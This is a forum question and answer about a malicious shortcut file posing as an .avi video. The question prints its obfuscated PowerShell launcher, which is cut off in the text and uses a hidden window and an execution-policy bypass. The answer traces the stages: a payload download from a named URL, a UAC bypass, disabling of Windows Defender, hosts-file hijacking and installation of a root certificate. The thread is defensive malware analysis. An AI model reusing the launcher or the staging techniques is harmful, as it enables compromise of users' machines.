I got a file that was .avi
at the fist glance, but then I found out that in fact this is a .lnk
file, but it was too late.
And the target element attribute of that file is
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82
The starting point is: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
I created String out of following ASCII codes and it seems that it is a BASE64 format of Hallo World!
. It seems very confusing to me as I couldn't find NoPr
, Wind
and eXEc
parameters anywhere in the docs of Powershell, additionaly for some reason the file had size of 700MB until I removed .avi
value from file description field.
Do you know what this file could try to do?
Best Answer
This is definitely malware!
Basically this is a malware with multiple stages. So far I have gone through:
Stage 1 (the .lnk file)
Downloads and executes powershell code from http://zvd.us/1
Stage 2
The downloaded powershell code contains a verbatim copy of https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1, which seems to be some UAC bypass. It then downloads and executes (as admin) a batch file.
Stage 3
The batch file first tries to disable all Windows Defender components (drivers, scheduled tasks, autorun entries) and adds group policies to that effect. It then downloads and executes 2 files. I will post virus total links to the files.
The first seems to be a recognised malware. Whereas the second is an NSIS installer which I have yet to analyze fully. It seems replace the systems
hosts
file with it's own, redirecting many domains to 80.241.222.137 and it installs a root certificate.